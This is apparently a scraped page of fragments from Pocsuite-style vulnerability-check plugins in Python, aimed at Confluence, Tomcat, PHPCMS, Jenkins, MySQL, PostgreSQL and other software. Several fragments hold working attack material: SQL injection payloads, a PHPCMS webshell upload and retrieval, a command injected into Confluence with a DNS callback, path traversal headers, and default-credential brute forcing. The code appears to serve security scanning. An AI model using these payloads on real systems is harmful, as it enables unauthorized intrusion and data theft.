예제 #1
    

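    def _attack(self):
        """Attack mode: delegate to _verify() and return its Output report.

        The original built an unused ``result`` dict and dropped _verify()'s
        return value, so the framework received None instead of a report.
        """
        return self._verify()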

    def _verify(self):
        """Probe the hotel-info endpoint for the error-based SQLi marker and build the report.

        A vulnerable target echoes the probe's ~~~...~~~ marker back in the
        body; only then is VerifyInfo (URL and payload) filled in. The request
        carries a 15 s timeout; transport errors propagate to the caller.
        """
        result = {}
        vulurl = "%s/?m=hotel.getHotelInfo" % self.url
        payload = {"hotelId":"11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(MD5(3.14) AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"}
        resp = req.post(vulurl, data=payload, timeout=15)
        marker_hits = re.findall(r'~~~(.*?)~~~', resp.content, re.S | re.I)
        if marker_hits:
            result['VerifyInfo'] = {'URL': vulurl, 'Payload': payload}
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in an Output report: success when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail('Internet nothing returned')
            return report
        report.success(result)
        return report


# Register this POC class with the framework (register() is imported outside this listing).
register(TestPOC)
예제 #2
            s.send(binascii.unhexlify(tree_connect_andx_request))
            data = s.recv(1024)
            all_id = data[28:36]
            payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff000000000000000000" \
                      "0000004a0000004a0002002300000007005c504950455c00" % all_id.encode('hex')
            s.send(binascii.unhexlify(payload))
            data = s.recv(1024)
            s.close()
            if "\x05\x02\x00\xc0" in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload[:20]
                result['VerifyInfo']['result'] = data[:20]
        except Exception as e:
            pass
        return self.parse_attack(result)

    def _attack(self):
        """Attack mode is identical to verify mode for this POC."""
        verify = self._verify
        return verify()

    def parse_attack(self, result):
        """Build the Output report from *result*; an empty result is reported as a failure."""
        report = Output(self)
        if not result:
            report.fail('Internet noting return')
        else:
            report.success(result)
        return report


# Register this POC class with the framework (register() is imported outside this listing).
register(TestPOC)
예제 #3
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname,
                       port=int(port),
                       username=username,
                       password="",
                       pkey=None,
                       key_filename=keyfile)

        stdin, stdout, stderr = client.exec_command(command)
        cmd_output = stdout.read()
        client.close()
        return True if cmd_output == 'root' else False

    except IOError:
        logger.debug(
            "Generate a keyfile for tool to bypass remote/local server credentials."
        )
        return False
    except paramiko.SSHException as e:
        logger.debug(
            "TCPForwarding disabled on remote server can't connect. Not Vulnerable"
        )
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False


# Register this POC class with the framework (register() is imported outside this listing).
register(DemoPOC)
예제 #4
                print '%s is vulnerable!' % testurl
                return True
            else:
                print '没有发现关键字:successfully. '
                return False

        except Exception as e:
            print '连接失败'
            pass

        return self.save_output(result)

    # Attack module
    def _attack(self):
        """No attack mode is implemented for this POC; always returns None."""
        return None

    # Output report
    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(TomcatuploadPOC)
예제 #5
            except:
                #print e
                pass
        if vul_port.__len__() > 0:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = self.url
            result['VerifyInfo']['Payload'] = "port:" + str(vul_port)
        print '[+]28 poc done'
        return self.save_output(result)
        #pass

    # Attack module
    def _attack(self):
        """Attack mode re-runs verification and returns its report."""
        verify = self._verify
        return verify()

    # Output report
    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(HadoopPOC)


예제 #6
        临时判断 , 有正确和误报时,对比提取特征解决误报
        """
        #print r,type(r)
        title = re.findall(r"<title>(.*)</title>", r.content)[0]
        if 'Solr Admin' in title and 'Dashboard' in r.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Payload'] = Payload
        else:
            result = {}
        print '[+]7 poc done'
        return self.save_output(result)

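    # Attack mode
    def _attack(self):
        """Attack mode re-runs verification and returns its report.

        The unused ``result`` local of the original is dropped; behaviour is unchanged.
        """
        return self._verify()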

    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report


# Register this POC class with the framework (register() is imported outside this listing).
register(SolrPOC)
예제 #7
        cmd = "ping {0}.{1}".format(self.BANNER, self.DOMAIN)
        self._verify(template, cmd)
        if self.dnslog_sucess(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
        return self.save_output(result)

    # Output report
    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report

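    # Check whether the DNS-log service recorded the callback, i.e. the injected command ran
    def dnslog_sucess(self, url):
        """Return True if the DNS log at *url* shows a lookup containing self.BANNER.

        The JSON body is expected to look like {"data": [{"name": ...}, ...]}; a
        non-JSON body, missing keys or an empty list count as "not seen" and
        yield False instead of raising. A transport failure in req.get() still
        propagates, as before. Always returns a bool — the original fell
        through to None when the banner was absent.
        """
        _resp = req.get(url)
        try:
            name = _resp.json()['data'][0]['name']
        except Exception:
            return False
        return self.BANNER in name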


# Register the POC class with the framework (register() is imported outside this listing).
register(ConfluenceRcePOC)
            try:
                resp = req.get(url=vul_url, timeout=3, verify=False)
                if resp.headers[
                        'Content-Type'] and 'application/json' in resp.headers[
                            'Content-Type'] and len(resp.content) > 500:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['url'] = vul_url
                    result['VerifyInfo']['Payload'] = 'path:/{}'.format(i)
                    break
            except Exception as e:
                pass
        print '[+]58 poc done'
        return self.save_output(result)

    # Attack module
    def _attack(self):
        """No attack mode is implemented for this POC; always returns None."""
        return None

    # Output report
    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(ActuaorPOC)
예제 #9
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Payload'] = vul_url
            else:
                print '[+] No Vulnerable found'
        except Exception as e:
            print e
            pass
        print '[+]44 poc done'
        return self.save_output(result)

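    # Attack module
    def _attack(self):
        """Attack mode re-runs verification and returns its report.

        The unused ``result`` local of the original is dropped; behaviour is unchanged.
        """
        return self._verify()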


    # Output report
    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(DNSPOC)

                else:
                    print '[-]The X-Proxy-Cache is MISS.'
                    print '[-]Can not find the vuln.'
            else:
                print '[-]The header without X-Proxy-Cache.'
                print '[-]Can not find the vuln.'
        except Exception as e:
            # return host
            print e
       
        return self.save_output(result)

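    # Attack mode
    def _attack(self):
        """Attack mode re-runs verification and returns its report.

        The unused ``result`` local of the original is dropped; behaviour is unchanged.
        """
        return self._verify()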

    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report

# Register this POC class with the framework (register() is imported outside this listing).
register(NginxPOC)


예제 #11
            return self.save_output(result)
        return self.save_output(result)

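    # Check whether the DNS-log service recorded the callback, i.e. the injected command ran
    def dnslog_sucess(self, url):
        """Return True if the DNS log at *url* shows a lookup containing self.BANNER.

        The JSON body is expected to look like {"data": [{"name": ...}, ...]}; a
        non-JSON body, missing keys or an empty list count as "not seen" and
        yield False instead of raising. A transport failure in req.get() still
        propagates, as before. Always returns a bool — the original fell
        through to None when the banner was absent.
        """
        resp = req.get(url)
        try:
            name = resp.json()['data'][0]['name']
        except Exception:
            return False
        return self.BANNER in name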

    # Attack module
    def _attack(self):
        """Attack mode is identical to verify mode for this POC."""
        verify = self._verify
        return verify()

    # Output report
    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(NexusManagerPOC)
예제 #12
                return True
            else:
                print '没有发现 :root: 特征字'
                return False

        except Exception as e:
            print 'socket连接失败'
            pass

        sock.close()

        return self.save_output(result)

    # Attack module
    def _attack(self):
        """No attack mode is implemented for this POC; always returns None."""
        return None

    # Output report
    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(fastcgiPOC)
            output.fail('Internet nothing returned')
        return output

    def query(self, ns):
        """Resolve nameserver *ns* to an address and attempt a zone transfer from it.

        Returns the transferred zone text, or None (after an "AXFR failed" notice
        on stderr) when the transfer is malformed, fails at the socket level, or
        yields nothing (pull_zone raises EOFError for an empty transfer).
        """
        nsaddr = self.resolve_a(ns)
        try:
            zone = self.pull_zone(nsaddr)
        except (exception.FormError, socket.error, EOFError):
            sys.stderr.write("AXFR failed\n\n")
            return None
        return zone

    def resolve_a(self, name):
        """Return the first A record for *name* as a dotted-quad string."""
        answers = resolver.query(name, 'A')
        first = answers[0]
        return str(first)

    def pull_zone(self, nameserver):
        """Request an AXFR of self.domain from *nameserver* and return it as one string.

        Raises EOFError when the transfer produced no messages, so the caller can
        treat an empty transfer the same as a refused one.
        """
        messages = query.xfr(nameserver, self.domain, relativize=False, timeout=2)
        zone = "".join(str(m) for m in messages)
        if not zone:
            raise EOFError
        return zone


# Register this POC class with the framework (register() is imported outside this listing).
register(DNS_transforPoc)
예제 #14
    # POC metadata read by the framework (the class header is above this excerpt).
    references = ['https://www.openssl.org/~bodo/ssl-poodle.pdf']
    name = 'SSL 3.0 POODLE攻击信息泄露漏洞 POC'
    appPowerLink = 'https://tools.ietf.org/html/rfc6101'
    appName = 'SSL'
    appVersion = '3.0'
    vulType = 'Information Disclosure'
    # Description (Chinese): SSLv3's CBC implementation lets an attacker decrypt
    # parts of the session, e.g. cookies.
    desc = '''
        SSL 3.0使用的CBC块加密的实现存在漏洞,攻击者可以成功破解SSL连接的加密信息,比如获取用户cookie数据
    '''
    samples = ['www.baidu.com', 'taobao.com']

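    def _verify(self):
        """Check whether the target still accepts SSLv3 (POODLE) and build the report.

        The host is derived from self.url via url2ip(); the port defaults to 443
        when the URL carries none. On a positive check VerifyInfo records the URL
        and port probed — the original passed an empty dict to success(), so the
        report had nothing to show, unlike every other POC in this file.
        """
        result = {}
        output = Output(self)

        target_ip = url2ip(self.url)
        url = urlparse.urlparse(self.url)
        port = url.port or 443

        if check_poodle(target_ip, port):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Port'] = port
            output.success(result)
        else:
            output.fail('Not support SSLv3 connection. Not Vulnerable')
        return output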

    def _attack(self):
        """Attack mode is identical to verify mode for this POC."""
        verify = self._verify
        return verify()


# Register this POC class with the framework (register() is imported outside this listing).
register(SSLv3_POODLE)
                                           u,
                                           pwd,
                                           'mysql',
                                           connect_timeout=_conn_timeout)
                    conn.close()
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_ip
                    result['VerifyInfo']['Payload'] = u + ":" + pwd
                    return self.save_output(result)
                except Exception as e:
                    pass
        return self.save_output(result)

    # Attack module
    def _attack(self):
        """Attack mode re-runs verification and returns its report."""
        verify = self._verify
        return verify()

    # Output report
    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(MYSQLPOC)
예제 #16
            print(message)
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = ip
            result['VerifyInfo']['Payload'] = pay
            return True

        else:
            print '没有发现关键字.'
            return False

        return self.save_output(result)


    # Attack module
    def _attack(self):
        """No attack mode is implemented for this POC; always returns None."""
        return None

    # Output report
    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(iis_RCE_POC)
예제 #17
        # print check
        if response:
            for x in check:
                if salt in check[x]:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = self.url
                    result['VerifyInfo']['Payload'] = 'Host: ' + salt
                    break
        else:
            result = {}
        print '[+]25 poc done'
        return self.save_output(result)

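    # Attack mode
    def _attack(self):
        """Attack mode re-runs verification and returns its report.

        The unused ``result`` local of the original is dropped; behaviour is unchanged.
        """
        return self._verify()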

    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report


# Register this POC class with the framework (register() is imported outside this listing).
register(HTTPPOC)
예제 #18
                            break
                    else:
                        break
            except:
                return 0
        return 0
    def _attack(self):
        '''attack mode: identical to verify mode for this POC'''
        verify = self._verify
        return verify()

    def _verify(self):
        '''verify mode: fingerprint the target with TestingCms() and build the report'''
        result = {}
        # TestingCms() signals a match with the integer 1; anything else is "not found".
        matched = self.TestingCms(self.url) == 1
        if matched:
            result['VerifyInfo'] = {'URL': self.url}
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in an Output report: success when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail('Internet nothing returned')
            return report
        report.success(result)
        return report


# Register this POC class with the framework (register() is imported outside this listing).
register(DedeShortNamePOC)
예제 #19
            s.connect((ip, port))
            print('Rsync未授权访问')
            message = 'Rsync 873端口 未授权访问'
            result['VerifyInfo'] = {}
            result['VerifyInfo']['url'] = ip
            result['VerifyInfo']['Payload'] = message
        except Exception as e:
            print(e)
        s.close()
        print '[+]30 poc done'
        return self.save_output(result)

    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report

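    # Attack module
    def _attack(self):
        """Attack mode re-runs verification and returns its report.

        The unused ``result`` local of the original is dropped; behaviour is unchanged.
        """
        return self._verify()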


# Register the POC class with the framework (register() is imported outside this listing).
register(rsyncPOC)
예제 #20
                    print '当前  ' + u + ":" + p

                    reponse = req.get(vul_url, timeout=5, headers=header)
                    if ("Tomcat Web Application Manager" in reponse.text):
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = vul_url
                        result['VerifyInfo']['Payload'] = u + ":" + p
                except Exception as e:
                    print e
                    pass
        print '[+]34 poc done'
        return self.save_output(result)

    # Attack module
    def _attack(self):
        """No attack mode is implemented for this POC; always returns None."""
        return None

    # Output report
    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(TomcatPOC)
예제 #21
    def test_register_poc(self):
        """register() must record test_class under its bare module name in kb.registered_pocs."""
        register(test_class)

        module_name = test_class.__module__.split('.')[-1]
        assert kb.registered_pocs is not None
        assert module_name in kb.registered_pocs
예제 #22
            'xajax':
            'LiveMessage',
            'xajaxargs[0][name]':
            "1',(SELECT 1 FROM (select count(*),concat("
            "floor(rand(0)*2),(select md5(233)))a from "
            "information_schema.tables group by a)b),"
            "'','','','1','127.0.0.1','2') #"
        }

        response = req.post(vul_url, data=payload, timeout=30).content
        if 'e165421110ba03099a1c0393373c5b43' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url

        return self.parse_attack(result)

    def _attack(self):
        """Attack mode is identical to verify mode for this POC."""
        verify = self._verify
        return verify()

    def parse_attack(self, result):
        """Build the Output report from *result*; an empty result is reported as a failure."""
        report = Output(self)
        if not result:
            report.fail("Internet nothing returned")
            return report
        report.success(result)
        return report


# Register this POC class with the framework (register() is imported outside this listing).
register(CmsEasyPoc)
예제 #23
        """
        临时判断 , 有正确和误报时,对比提取特征解决误报
        """
        #print r,type(r)
        if "Druid Console" in title:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url
            result['VerifyInfo']['Payload'] = vul_url
        else:
            pass
        print '[+]8 poc done'
        return self.save_output(result)

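    # Attack mode
    def _attack(self):
        """Attack mode re-runs verification and returns its report.

        The unused ``result`` local of the original is dropped; behaviour is unchanged.
        """
        return self._verify()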

    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report


# Register this POC class with the framework (register() is imported outside this listing).
register(DruidPOC)
            sk.connect((_host, _port))
        except Exception:
            return self.save_output(result)
        sk.close()

        resulta = checkUsername("rootasdf23", _host)
        if (resulta == "1"):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = _host
            result['VerifyInfo']['Payload'] = "存在ssh 用户枚举".decode("utf8")

        return self.save_output(result)

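    # Attack module
    def _attack(self):
        """Attack mode re-runs verification and returns its report.

        The unused ``result`` local of the original is dropped; behaviour is unchanged.
        """
        return self._verify()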

    # Output report
    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(SS1HPOC)
예제 #25
                text = req.get(url,timeout=4).text
                if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_ip
                    result['VerifyInfo']['Payload'] = p
                    return self.save_output(result)
            except Exception as e:
                print e
                pass
                
        return self.save_output(result)
            

    # Attack module
    def _attack(self):
        """Attack mode re-runs verification and returns its report."""
        verify = self._verify
        return verify()

    # Output report
    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report

# Register the POC class with the framework (register() is imported outside this listing).
register(webLogicPOC)

예제 #26
                result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul'

                return self.save_output(result)

        except:
            print '连接失败'
            pass

        sock.close()
        # print '-' * 18 + '\n'
        print data
        # print '-' * 18 + '\n'

    # Attack module
    def _attack(self):
        """No attack mode is implemented for this POC; always returns None."""
        return None

    # Output report
    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(MSPOC)
예제 #27
        #如果有结果则输出
        if len(payload_dict) != 0 :
            for i in payload_dict:
                if payload_dict.values().count(payload_dict[i]) == 1:
                    final_url.append(i)
            print final_url
            if ((len(final_url)) != 0 and (len(final_url)) <15):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Payload'] = str(final_url)   
        print '[+]11 poc done'
        return self.save_output(result)

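    # Attack mode
    def _attack(self):
        """Attack mode re-runs verification and returns its report.

        The unused ``result`` local of the original is dropped; behaviour is unchanged.
        """
        return self._verify()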

    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report

# Register this POC class with the framework (register() is imported outside this listing).
register(FilefindPOC)

예제 #28
            ret = ssltest(_host, _port)
            # print ret
            if ret == "check":
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = host
                result['VerifyInfo']['Payload'] = payload
            else:
                pass
        except:
            pass
        print '[+]20 poc done'
        return self.save_output(result)

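    # Attack mode
    def _attack(self):
        """Attack mode re-runs verification and returns its report.

        The unused ``result`` local of the original is dropped; behaviour is unchanged.
        """
        return self._verify()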

    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report


# Register this POC class with the framework (register() is imported outside this listing).
register(OpensslPOC)
예제 #29
            "dosubmit": "1",
            "protocol": "",
        }
        match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
        resp = req.post(url, data=data)
        shell = re.findall(match, resp.text)
        shellinfo = ''.join(shell[0]) + ".php"
        if shell:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            shell_resp = req.get(shellinfo)
            if shell_resp.status_code == 200:
                result['VerifyInfo']['webshell'] = shellinfo
        return self.parse_attack(result)

    # NOTE(review): this alias is dead code — the `def _attack` further down in the
    # class rebinds the name, so that method is what actually runs in attack mode.
    _attack = _verify

    def parse_attack(self, result):
        """Build the Output report from *result*; an empty result is reported as a failure."""
        report = Output(self)
        if not result:
            report.fail('Internet nothing returned')
            return report
        report.success(result)
        return report

    def _attack(self):
        """Attack mode is identical to verify mode for this POC."""
        verify = self._verify
        return verify()


# Register this POC class with the framework (register() is imported outside this listing).
register(phpcms_getshll)
예제 #30
        header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name}
        try:
            vulurl = vul_ip + '/plugin/credentials/.ini'
            vulurltest = req.get(vulurl, headers=header)
            if "MPEGVideo" in vulurltest.text:
                if vulurltest.text.find('version'):
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['url'] = vulurl
                    result['VerifyInfo']['Payload'] = header
        except Exception as e:
            pass

        return self.save_output(result)

    # Attack module
    def _attack(self):
        """Attack mode is identical to verify mode for this POC."""
        verify = self._verify
        return verify()

    # Output report
    def save_output(self, result):
        """Build the Output report: success with *result* when non-empty, fail otherwise."""
        report = Output(self)
        if not result:
            report.fail()
            return report
        report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(JenkinsPOC)
                message = u' {} 5432端口 Postgresql 存在弱口令: postgres  {}'.format(
                    _host, pwd)
                print "有弱口令漏洞"
                conn.close()
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = self.url
                result['VerifyInfo']['Payload'] = message
                break
            except Exception as e:
                print e
        print '[+]29 poc done'
        return self.save_output(result)

    # Attack module
    def _attack(self):
        """Attack mode is identical to verify mode for this POC."""
        verify = self._verify
        return verify()

    # Output report
    def save_output(self, result):
        """Build the Output report from *result*; an empty result is a failure."""
        report = Output(self)
        if not result:
            report.fail()
        else:
            report.success(result)
        return report


# Register the POC class with the framework (register() is imported outside this listing).
register(PGPOC)